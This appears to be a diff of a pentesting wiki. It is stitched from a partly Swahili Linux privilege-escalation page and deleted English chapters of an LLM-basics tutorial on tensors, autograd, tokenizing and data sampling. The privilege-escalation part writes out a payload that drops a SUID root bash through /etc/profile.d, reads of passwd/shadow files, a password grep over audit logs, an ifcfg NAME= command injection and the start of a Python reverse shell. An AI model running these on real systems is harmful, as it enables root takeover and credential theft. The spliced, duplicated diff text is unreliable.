Hitilafu hii inasababishwa wakati wa kuunda funguo mpya za ssh katika mifumo hiyo, kwani **mabadiliko 32,768 pekee yalikuwa yanawezekana**. Hii inamaanisha kwamba uwezekano wote unaweza kuhesabiwa na **ikiwa una funguo ya umma ya ssh unaweza kutafuta funguo ya faragha inayolingana**. Unaweza kupata uwezekano uliohesabiwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
 | 
			
		||||
Hitilafu hii inasababishwa wakati wa kuunda funguo mpya za ssh katika mifumo hiyo, kwani **mabadiliko 32,768 pekee yalikuwa yanawezekana**. Hii inamaanisha kwamba uwezekano wote unaweza kuhesabiwa na **ikiwa una funguo ya umma ya ssh unaweza kutafuta funguo ya kibinafsi inayolingana**. Unaweza kupata uwezekano uliohesabiwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
 | 
			
		||||
 | 
			
		||||
### SSH Interesting configuration values
 | 
			
		||||
### SSH Thamani za usanidi zinazovutia
 | 
			
		||||
 | 
			
		||||
- **PasswordAuthentication:** Inaeleza ikiwa uthibitishaji wa nenosiri unaruhusiwa. Kiwango cha kawaida ni `no`.
 | 
			
		||||
- **PubkeyAuthentication:** Inaeleza ikiwa uthibitishaji wa funguo za umma unaruhusiwa. Kiwango cha kawaida ni `yes`.
 | 
			
		||||
- **PermitEmptyPasswords**: Wakati uthibitishaji wa nenosiri unaruhusiwa, inaeleza ikiwa seva inaruhusu kuingia kwenye akaunti zenye nywila tupu. Kiwango cha kawaida ni `no`.
 | 
			
		||||
- **PasswordAuthentication:** Inaelezea ikiwa uthibitishaji wa nenosiri unaruhusiwa. Kiwango cha kawaida ni `no`.
 | 
			
		||||
- **PubkeyAuthentication:** Inaelezea ikiwa uthibitishaji wa funguo za umma unaruhusiwa. Kiwango cha kawaida ni `yes`.
 | 
			
		||||
- **PermitEmptyPasswords**: Wakati uthibitishaji wa nenosiri unaruhusiwa, inaelezea ikiwa seva inaruhusu kuingia kwenye akaunti zenye nywila tupu. Kiwango cha kawaida ni `no`.
 | 
			
		||||
 | 
			
		||||
### PermitRootLogin
 | 
			
		||||
 | 
			
		||||
Inaeleza ikiwa root anaweza kuingia kwa kutumia ssh, kiwango cha kawaida ni `no`. Thamani zinazowezekana:
 | 
			
		||||
Inaelezea ikiwa root anaweza kuingia kwa kutumia ssh, kiwango cha kawaida ni `no`. Thamani zinazowezekana:
 | 
			
		||||
 | 
			
		||||
- `yes`: root anaweza kuingia kwa kutumia nenosiri na funguo ya faragha
 | 
			
		||||
- `without-password` au `prohibit-password`: root anaweza kuingia tu kwa funguo ya faragha
 | 
			
		||||
- `forced-commands-only`: Root anaweza kuingia tu kwa kutumia funguo ya faragha na ikiwa chaguo za amri zimeelezwa
 | 
			
		||||
- `yes`: root anaweza kuingia kwa kutumia nenosiri na funguo ya kibinafsi
 | 
			
		||||
- `without-password` au `prohibit-password`: root anaweza kuingia tu kwa funguo ya kibinafsi
 | 
			
		||||
- `forced-commands-only`: Root anaweza kuingia tu kwa kutumia funguo ya kibinafsi na ikiwa chaguo za amri zimeelezwa
 | 
			
		||||
- `no` : hapana
 | 
			
		||||
 | 
			
		||||
### AuthorizedKeysFile
 | 
			
		||||
 | 
			
		||||
Inaeleza faili ambazo zinafunguo za umma ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na alama kama `%h`, ambayo itabadilishwa na saraka ya nyumbani. **Unaweza kuashiria njia kamili** (zinazoanzia `/`) au **njia za kulinganisha kutoka nyumbani kwa mtumiaji**. Kwa mfano:
 | 
			
		||||
Inaelezea faili ambazo zinafunguo za umma ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na alama kama `%h`, ambayo itabadilishwa na saraka ya nyumbani. **Unaweza kuashiria njia kamili** (zinazoanzia na `/`) au **njia za kulinganisha kutoka nyumbani kwa mtumiaji**. Kwa mfano:
 | 
			
		||||
```bash
 | 
			
		||||
AuthorizedKeysFile    .ssh/authorized_keys access
 | 
			
		||||
```
 | 
			
		||||
@ -1151,7 +1151,7 @@ Iyo usanidi utaonyesha kwamba ikiwa unajaribu kuingia na **funguo** ya mtumiaji
 | 
			
		||||
 | 
			
		||||
### ForwardAgent/AllowAgentForwarding

SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** (without passphrases!) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located on your **initial host**.

You need to set this option in `$HOME/.ssh/config` like this:
```
@ -1161,7 +1161,7 @@ ForwardAgent yes
```

Note that if `Host` is `*`, every time the user jumps to a different machine, that host will be able to access the keys (which is a security issue).

The file `/etc/ssh_config` can **override** these **options** and allow or deny this configuration.\
The file `/etc/sshd_config` can **allow** or **deny** ssh-agent forwarding with the keyword `AllowAgentForwarding` (the default is allow).

If you find that Forward Agent is configured in an environment, read the following page as **you may be able to abuse it to escalate privileges**:

@ -1173,7 +1173,7 @@ ssh-forward-agent-exploitation.md

### Profile files

The files `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user starts a new shell**. Therefore, if you can **write to or modify any of them you can escalate privileges**.
```bash
ls -l /etc/profile /etc/profile.d/
```
@ -1181,7 +1181,7 @@ Ikiwa kuna skripti za wasifu zisizo za kawaida, unapaswa kuziangalia kwa **maele

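A minimal sketch of what abusing this would look like (the payload filename and the SUID-bash trick below are hypothetical illustrations, only relevant if one of these scripts or the directory is actually writable by you):
```bash
# Check whether anything under the profile scripts is writable by the current user
find /etc/profile /etc/profile.d/ -writable 2>/dev/null

# Hypothetical payload: a SUID copy of bash gets dropped the next time anyone starts a login shell
echo 'cp /bin/bash /tmp/.rootbash && chmod u+s /tmp/.rootbash' > /etc/profile.d/00-update.sh
```
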
### Passwd/Shadow Files

Depending on the OS, the `/etc/passwd` and `/etc/shadow` files may use a different name or there may be a backup copy. Therefore it is recommended to **find all of them** and **check if you can read** them, to see **if there are hashes** inside the files:
```bash
#Passwd equivalent files
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
@ -1280,24 +1280,24 @@ ls -alhR /srv/www/htdocs/ 2>/dev/null
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 2>/dev/null
```

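A quick, hedged check for hashes stored directly in passwd-style files (assumes the usual colon-separated `user:hash:...` layout):
```bash
# A second field starting with "$<id>$" usually means a crypt hash is stored in the file itself
grep -E '^[^:]+:\$[0-9a-zA-Z]+\$' /etc/passwd /etc/master.passwd 2>/dev/null
```
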
### **Backup files**
```bash
find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null
```

### Known files containing passwords

Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for **several possible files that could contain passwords**.\
**Another interesting tool** that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) which is an open source application used to retrieve lots of passwords stored on a local computer for Windows, Linux & Mac.

### Logs

If you can read logs, you may be able to find **interesting/confidential information inside them**. The stranger the log is, the more interesting it will probably be.\
Also, some "**badly**" configured (backdoored?) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
```bash
aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
```
Also, in order to **read logs**, the group [**adm**](interesting-groups-linux-pe/index.html#adm-group) will be really helpful.

### Shell files
```bash
@ -1327,26 +1327,26 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
```

### Logrotate exploitation

A vulnerability in `logrotate` lets users with **write permissions** on a log file or its parent directories potentially gain escalated privileges. This is because `logrotate`, often running as **root**, can be manipulated into executing arbitrary files, especially in directories like _**/etc/bash_completion.d/**_. It is important to check permissions not only in _/var/log_ but also in any directory where log rotation is applied.

> [!TIP]
> This vulnerability affects `logrotate` version `3.18.0` and older

More detailed information about the vulnerability can be found on this page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).

You can exploit this vulnerability with [**logrotten**](https://github.com/whotwagner/logrotten).

This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges by substituting the logs with symlinks.

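A minimal sketch to spot candidate targets (assumes the standard `/etc/logrotate.conf` and `/etc/logrotate.d/` locations):
```bash
# List log paths referenced by logrotate and flag those whose file or parent dir is writable
grep -RhoE '^\s*/[^ {]+' /etc/logrotate.conf /etc/logrotate.d/ 2>/dev/null | while read -r log; do
  [ -w "$log" ] && echo "[writable log] $log"
  [ -w "$(dirname "$log")" ] && echo "[writable dir] $(dirname "$log")"
done
```
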
### /etc/sysconfig/network-scripts/ (Centos/Redhat)

**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)

If, for whatever reason, a user is able to **write** an `ifcf-<whatever>` script to _/etc/sysconfig/network-scripts_ **or** can **adjust** an existing one, then your **system is pwned**.

Network scripts, _ifcg-eth0_ for example, are used for network connections. They look exactly like .INI files. However, they are \~sourced\~ on Linux by Network Manager (dispatcher.d).

In my case, the `NAME=` attribute in these network scripts is not handled correctly. If you have **white/blank space in the name the system tries to execute the part after the white/blank space**. This means that **everything after the first blank space is executed as root**.

For example: _/etc/sysconfig/network-scripts/ifcfg-1337_
```bash
@ -1356,9 +1356,9 @@ DEVICE=eth0
```

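The example `ifcfg` content is truncated by the diff above; a minimal sketch of the idea (the `NAME=` value, the payload and the `ONBOOT` line are illustrative assumptions, only `DEVICE=eth0` comes from the visible context):
```bash
NAME=Network /bin/id   # everything after the first blank space is executed as root when the script is sourced
ONBOOT=yes
DEVICE=eth0
```
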
### **init, init.d, systemd, and rc.d**

The directory `/etc/init.d` is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path on Redhat systems is `/etc/rc.d/init.d`.

On the other hand, `/etc/init` is associated with **Upstart**, a newer **service management** system introduced by Ubuntu, which uses configuration files for service management tasks. Despite the transition to Upstart, SysVinit scripts are still used alongside Upstart configurations thanks to a compatibility layer in Upstart.

**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process.

@ -1370,7 +1370,7 @@ Kwa upande mwingine, `/etc/init` inahusishwa na **Upstart**, **usimamizi wa hudu
nfs-no_root_squash-misconfiguration-pe.md
{{#endref}}

### Escaping from restricted Shells

{{#ref}}
escaping-from-limited-bash.md
@ -1400,7 +1400,7 @@ cisco-vmanage.md

**Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\
**Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\
**BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\
**Kernelpop:** Enumerate kernel vulns in Linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\
**Metasploit:** _**multi/recon/local_exploit_suggester**_\
**Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\
**EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\

@ -1,285 +0,0 @@
# 0. Basic LLM Concepts

## Pretraining

Pretraining is the foundational phase in developing a large language model (LLM), where the model is exposed to vast and diverse amounts of text data. During this stage, **the LLM learns the fundamental structures, patterns, and nuances of language**, including grammar, vocabulary, syntax, and contextual relationships. By processing this extensive data, the model acquires a broad understanding of the language and general world knowledge. This comprehensive base enables the LLM to generate coherent and contextually relevant text. Afterwards, this pretrained model can undergo fine-tuning, where it is further trained on specialized datasets to adapt its capabilities to specific tasks or domains, improving its performance and relevance for the intended applications.

## Main LLM components

Usually an LLM is characterised by the configuration used to train it. These are the common components when training an LLM:

- **Parameters**: Parameters are the **learnable weights and biases** in the neural network. These are the numbers that the training process adjusts to minimize the loss function and improve the model's performance on the task. LLMs usually use millions of parameters.
- **Context Length**: This is the maximum length of each sequence used to pre-train the LLM.
- **Embedding Dimension**: The size of the vector used to represent each token or word. LLMs usually use hundreds to thousands of dimensions.
- **Hidden Dimension**: The size of the hidden layers in the neural network.
- **Number of Layers (Depth)**: How many layers the model has. LLMs usually use tens of layers.
- **Number of Attention Heads**: In transformer models, this is how many separate attention mechanisms are used in each layer. LLMs usually use tens of heads.
- **Dropout**: Dropout is roughly the percentage of activations that are dropped (their values turn to 0) during training, used to **prevent overfitting.** LLMs usually use between 0-20%.

Configuration of the GPT-2 model:
```json
GPT_CONFIG_124M = {
"vocab_size": 50257,  // Vocabulary size of the BPE tokenizer
"context_length": 1024, // Context length
"emb_dim": 768,       // Embedding dimension
"n_heads": 12,        // Number of attention heads
"n_layers": 12,       // Number of layers
"drop_rate": 0.1,     // Dropout rate: 10%
"qkv_bias": False     // Query-Key-Value bias
}
```

## Tensors in PyTorch

In PyTorch, a **tensor** is a fundamental data structure that serves as a multi-dimensional array, generalizing concepts like scalars, vectors, and matrices to higher dimensions. Tensors are the primary way data is represented and manipulated in PyTorch, especially in the context of deep learning and neural networks.

### Mathematical Concept of Tensors

- **Scalars**: Tensors of rank 0, representing a single number (zero-dimensional). Like: 5
- **Vectors**: Tensors of rank 1, representing a one-dimensional array of numbers. Like: \[5,1]
- **Matrices**: Tensors of rank 2, representing two-dimensional arrays with rows and columns. Like: \[\[1,3], \[5,2]]
- **Higher-Rank Tensors**: Tensors of rank 3 or more, representing data in higher dimensions (e.g., 3D tensors for color images).

### Tensors as Data Containers

From a computational perspective, tensors act as containers for multi-dimensional data, where each dimension can represent different features or aspects of the data. This makes tensors highly suitable for handling complex datasets in machine learning tasks.

### PyTorch Tensors vs. NumPy Arrays

While PyTorch tensors are similar to NumPy arrays in their ability to store and manipulate numerical data, they offer additional functionalities crucial for deep learning:

- **Automatic Differentiation**: PyTorch tensors support automatic computation of gradients (autograd), which simplifies the process of computing the derivatives required for training neural networks.
- **GPU Acceleration**: Tensors in PyTorch can be moved to and computed on GPUs, significantly speeding up large-scale computations.

### Creating Tensors in PyTorch

You can create tensors using the `torch.tensor` function:
```python
import torch

# Scalar (0D tensor)
tensor0d = torch.tensor(1)

# Vector (1D tensor)
tensor1d = torch.tensor([1, 2, 3])

# Matrix (2D tensor)
tensor2d = torch.tensor([[1, 2],
                         [3, 4]])

# 3D Tensor
tensor3d = torch.tensor([[[1, 2], [3, 4]],
                         [[5, 6], [7, 8]]])
```

### Tensor Data Types

PyTorch tensors can store data of various types, such as integers and floating-point numbers.

You can check the data type of a tensor using the `.dtype` attribute:
```python
tensor1d = torch.tensor([1, 2, 3])
print(tensor1d.dtype)  # Output: torch.int64
```
- Tensors created from Python integers are of type `torch.int64`.
- Tensors created from Python floats are of type `torch.float32`.

To change the data type of a tensor, use the `.to()` method:
```python
float_tensor = tensor1d.to(torch.float32)
print(float_tensor.dtype)  # Output: torch.float32
```

### Common Tensor Operations

PyTorch provides a variety of operations to manipulate tensors:

- **Accessing Shape**: Use `.shape` to get the dimensions of a tensor.

```python
print(tensor2d.shape)  # Output: torch.Size([2, 2])
```

- **Reshaping Tensors**: Use `.reshape()` or `.view()` to change the shape.

```python
reshaped = tensor2d.reshape(4, 1)
```

- **Transposing Tensors**: Use `.T` to transpose a 2D tensor.

```python
transposed = tensor2d.T
```

- **Matrix Multiplication**: Use `.matmul()` or the `@` operator.

```python
result = tensor2d @ tensor2d.T
```

### Importance in Deep Learning

Tensors are essential in PyTorch for building and training neural networks:

- They store input data, weights, and biases.
- They facilitate the operations required for the forward and backward passes of training algorithms.
- Together with autograd, tensors enable automatic computation of gradients, streamlining the optimization process.

## Automatic Differentiation

Automatic differentiation (AD) is a computational technique used to **evaluate the derivatives (gradients)** of functions efficiently and accurately. In the context of neural networks, AD enables the computation of the gradients required for **optimization algorithms like gradient descent**. PyTorch provides an automatic differentiation engine called **autograd** that simplifies this process.

### Mathematical Explanation of Automatic Differentiation

**1. The Chain Rule**

At the heart of automatic differentiation is the **chain rule** from calculus. The chain rule states that if you have a composition of functions, the derivative of the composite function is the product of the derivatives of the composed functions.

Mathematically, if `y=f(u)` and `u=g(x)`, then the derivative of `y` with respect to `x` is:

<figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

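Since the formula above is only available as an image reference, the relationship it depicts is simply the standard chain rule:
```latex
\frac{dy}{dx} = \frac{dy}{du} \cdot \frac{du}{dx}
```
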
**2. Computational Graph**

In AD, computations are represented as nodes in a **computational graph**, where each node corresponds to an operation or a variable. By traversing this graph, we can compute derivatives efficiently.

3. Example

Let's take a simple function:

<figure><img src="../../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Where:

- `σ(z)` is the sigmoid function.
- `y=1.0` is the target label.
- `L` is the loss.

We want to compute the gradient of the loss `L` with respect to the weight `w` and the bias `b`.

**4. Computing Gradients Manually**

<figure><img src="../../images/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>

**5. Numerical Calculation**

<figure><img src="../../images/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>

### Implementing Automatic Differentiation in PyTorch

Now, let's see how PyTorch automates this process.
```python
import torch
import torch.nn.functional as F

# Define input and target
x = torch.tensor([1.1])
y = torch.tensor([1.0])

# Initialize weights with requires_grad=True to track computations
w = torch.tensor([2.2], requires_grad=True)
b = torch.tensor([0.0], requires_grad=True)

# Forward pass
z = x * w + b
a = torch.sigmoid(z)
loss = F.binary_cross_entropy(a, y)

# Backward pass
loss.backward()

# Gradients
print("Gradient w.r.t w:", w.grad)
print("Gradient w.r.t b:", b.grad)
```
**Output:**
```css
Gradient w.r.t w: tensor([-0.0898])
Gradient w.r.t b: tensor([-0.0817])
```

## Backpropagation in Bigger Neural Networks

### **1. Extending to Multilayer Networks**

In larger neural networks with multiple layers, the process of computing gradients becomes more complex due to the increased number of parameters and operations. However, the fundamental principles remain the same:

- **Forward Pass:** Compute the output of the network by passing the inputs through each layer.
- **Compute Loss:** Evaluate the loss function using the network's output and the target labels.
- **Backward Pass (Backpropagation):** Compute the gradients of the loss with respect to each parameter in the network by applying the chain rule recursively from the output layer back to the input layer.

### **2. Backpropagation Algorithm**

- **Step 1:** Initialize the network parameters (weights and biases).
- **Step 2:** For each training example, perform a forward pass to compute the outputs.
- **Step 3:** Compute the loss.
- **Step 4:** Compute the gradients of the loss with respect to each parameter using the chain rule.
- **Step 5:** Update the parameters using an optimization algorithm (e.g., gradient descent).

### **3. Mathematical Representation**

Consider a simple neural network with one hidden layer:

<figure><img src="../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>

### **4. PyTorch Implementation**

PyTorch simplifies this process with its autograd engine.
```python
import torch
import torch.nn as nn
import torch.optim as optim

# Define a simple neural network
class SimpleNet(nn.Module):
    def __init__(self):
        super(SimpleNet, self).__init__()
        self.fc1 = nn.Linear(10, 5)  # Input layer to hidden layer
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(5, 1)   # Hidden layer to output layer
        self.sigmoid = nn.Sigmoid()

    def forward(self, x):
        h = self.relu(self.fc1(x))
        y_hat = self.sigmoid(self.fc2(h))
        return y_hat

# Instantiate the network
net = SimpleNet()

# Define loss function and optimizer
criterion = nn.BCELoss()
optimizer = optim.SGD(net.parameters(), lr=0.01)

# Sample data
inputs = torch.randn(1, 10)
labels = torch.tensor([[1.0]])  # shape (1, 1) to match the network output

# Training loop
optimizer.zero_grad()          # Clear gradients
outputs = net(inputs)          # Forward pass
loss = criterion(outputs, labels)  # Compute loss
loss.backward()                # Backward pass (compute gradients)
optimizer.step()               # Update parameters

# Accessing gradients
for name, param in net.named_parameters():
    if param.requires_grad:
        print(f"Gradient of {name}: {param.grad}")
```

In this code:

- **Forward Pass:** Computes the output of the network.
- **Backward Pass:** `loss.backward()` computes the gradients of the loss with respect to all parameters.
- **Parameter Update:** `optimizer.step()` updates the parameters based on the computed gradients.

### **5. Understanding the Backward Pass**

During the backward pass:

- PyTorch traverses the computational graph in reverse order.
- For each operation, it applies the chain rule to compute gradients.
- Gradients are accumulated in the `.grad` attribute of each parameter tensor.

### **6. Advantages of Automatic Differentiation**

- **Efficiency:** It avoids redundant computations by reusing intermediate results.
- **Accuracy:** It provides exact derivatives up to machine precision.
- **Ease of Use:** It eliminates manual computation of derivatives.

@ -1,95 +0,0 @@
# 1. Tokenizing

## Tokenizing

**Tokenizing** is the process of breaking data, such as text, into smaller, manageable pieces called _tokens_. Each token is then assigned a unique numerical identifier (ID). This is a fundamental step in preparing text for processing by machine learning models, especially in natural language processing (NLP).

> [!TIP]
> The goal of this initial phase is very simple: **Split the input into tokens (ids) in some way that makes sense**.

### **How Tokenizing Works**

1. **Splitting the Text:**
   - **Basic Tokenizer:** A simple tokenizer might split text into individual words and punctuation marks, removing spaces.
   - _Example:_\
     Text: `"Hello, world!"`\
     Tokens: `["Hello", ",", "world", "!"]`
2. **Creating a Vocabulary:**
   - To convert tokens into numerical IDs, a **vocabulary** is created. This vocabulary lists all unique tokens (words and symbols) and assigns each one a specific ID.
   - **Special Tokens:** These are special symbols added to the vocabulary to handle various scenarios:
     - `[BOS]` (Beginning of Sequence): Indicates the start of a text.
     - `[EOS]` (End of Sequence): Indicates the end of a text.
     - `[PAD]` (Padding): Used to make all sequences in a batch the same length.
     - `[UNK]` (Unknown): Represents tokens that are not in the vocabulary.
   - _Example:_\
     If `"Hello"` is assigned ID `64`, `","` is `455`, `"world"` is `78`, and `"!"` is `467`, then:\
     `"Hello, world!"` → `[64, 455, 78, 467]`
   - **Handling Unknown Words:**\
     If a word like `"Bye"` isn't in the vocabulary, it is replaced with `[UNK]`.\
     `"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
     _(Assuming `[UNK]` has ID `987`)_

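To make the mapping concrete, here is a minimal sketch of such a basic word-level tokenizer (the corpus, vocabulary and IDs are hypothetical, not the GPT-2 BPE vocabulary used later):
```python
import re

corpus = "Hello, world! Hello again."
# Basic tokenizer: split on words and punctuation, drop whitespace
tokens = [t for t in re.split(r'([,.!?]|\s)', corpus) if t.strip()]

# Build the vocabulary: unique tokens -> IDs, plus an [UNK] special token
vocab = {tok: idx for idx, tok in enumerate(sorted(set(tokens)))}
vocab["[UNK]"] = len(vocab)

def encode(text):
    toks = [t for t in re.split(r'([,.!?]|\s)', text) if t.strip()]
    return [vocab.get(t, vocab["[UNK]"]) for t in toks]

print(encode("Hello, world!"))  # known tokens -> their IDs
print(encode("Bye, world!"))    # "Bye" is unknown -> the [UNK] ID
```
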
### **Advanced Tokenizing Methods**

While the basic tokenizer works well for simple texts, it has limitations, particularly with large vocabularies and handling new or rare words. Advanced tokenizing methods address these issues by breaking text into smaller subunits or optimizing the tokenization process.

1. **Byte Pair Encoding (BPE):**
   - **Purpose:** Reduces the size of the vocabulary and handles rare or unknown words by breaking them down into frequently occurring byte pairs.
   - **How It Works:**
     - Starts with individual characters as tokens.
     - Iteratively merges the most frequent pairs of tokens into a single token.
     - Continues until no more frequent pairs can be merged.
   - **Benefits:**
     - Eliminates the need for an `[UNK]` token since all words can be represented by combining existing subword tokens.
     - More efficient and flexible vocabulary.
   - _Example:_\
     `"playing"` might be tokenized as `["play", "ing"]` if `"play"` and `"ing"` are frequent subwords.
2. **WordPiece:**
   - **Used By:** Models like BERT.
   - **Purpose:** Similar to BPE, it breaks words into subword units to handle unknown words and reduce the vocabulary size.
   - **How It Works:**
     - Starts with a base vocabulary of individual characters.
     - Iteratively adds the most frequent subword that maximizes the likelihood of the training data.
     - Uses a probabilistic model to decide which subwords to merge.
   - **Benefits:**
     - Balances having a manageable vocabulary size with representing words effectively.
     - Handles rare and compound words efficiently.
   - _Example:_\
     `"unhappiness"` might be tokenized as `["un", "happiness"]` or `["un", "happy", "ness"]` depending on the vocabulary.
3. **Unigram Language Model:**
   - **Used By:** Models like SentencePiece.
   - **Purpose:** Uses a probabilistic model to determine the most likely set of subword tokens.
   - **How It Works:**
     - Starts with a large set of potential tokens.
     - Iteratively removes the tokens that least improve the model's likelihood of the training data.
     - Finalizes a vocabulary where each word is represented by the most probable subword units.
   - **Benefits:**
     - Flexible and can model language more naturally.
     - Often results in more efficient and compact tokenizations.
   - _Example:_\
     `"internationalization"` might be tokenized into smaller, meaningful subwords like `["international", "ization"]`.

## Code Example

Let's understand this better with a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
```python
# Download a text to pre-train the model
import urllib.request
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
file_path = "the-verdict.txt"
urllib.request.urlretrieve(url, file_path)

with open("the-verdict.txt", "r", encoding="utf-8") as f:
    raw_text = f.read()

# Tokenize the text using the GPT2 tokenizer version
import tiktoken
token_ids = tiktoken.get_encoding("gpt2").encode(raw_text, allowed_special={"<|endoftext|>"}) # Allow the special end-of-text token

# Print first 50 tokens
print(token_ids[:50])
#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
```
## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,240 +0,0 @@
# 2. Data Sampling

## **Data Sampling**

**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.

> [!TIP]
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**

### **Why Data Sampling Matters**

LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text.

### **Key Concepts in Data Sampling**

1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters).
2. **Sequence Length (max_length):** The number of tokens in each input sequence.
3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text.
4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence.

### **Step-by-Step Example**

Let's walk through an example to illustrate data sampling.

**Example Text**

```arduino
"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
```

**Tokenization**

Assume we use a **basic tokenizer** that splits the text into words and punctuation marks:

```vbnet
Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
```

**Parameters**

- **Max Sequence Length (max_length):** 4 tokens
- **Sliding Window Stride:** 1 token

**Creating Input and Target Sequences**

1. **Sliding Window Approach:**
   - **Input Sequences:** Each input sequence consists of `max_length` tokens.
   - **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence.
2. **Generating Sequences:**

   <table><thead><tr><th width="177">Window Position</th><th>Input Sequence</th><th>Target Sequence</th></tr></thead><tbody><tr><td>1</td><td>["Lorem", "ipsum", "dolor", "sit"]</td><td>["ipsum", "dolor", "sit", "amet,"]</td></tr><tr><td>2</td><td>["ipsum", "dolor", "sit", "amet,"]</td><td>["dolor", "sit", "amet,", "consectetur"]</td></tr><tr><td>3</td><td>["dolor", "sit", "amet,", "consectetur"]</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td></tr><tr><td>4</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td><td>["amet,", "consectetur", "adipiscing", "elit."]</td></tr></tbody></table>

3. **Resulting Input and Target Arrays:**

   - **Input:**

     ```python
     [
       ["Lorem", "ipsum", "dolor", "sit"],
       ["ipsum", "dolor", "sit", "amet,"],
       ["dolor", "sit", "amet,", "consectetur"],
       ["sit", "amet,", "consectetur", "adipiscing"],
     ]
     ```

   - **Target:**

     ```python
     [
       ["ipsum", "dolor", "sit", "amet,"],
       ["dolor", "sit", "amet,", "consectetur"],
       ["sit", "amet,", "consectetur", "adipiscing"],
       ["amet,", "consectetur", "adipiscing", "elit."],
     ]
     ```

**Visual Representation**

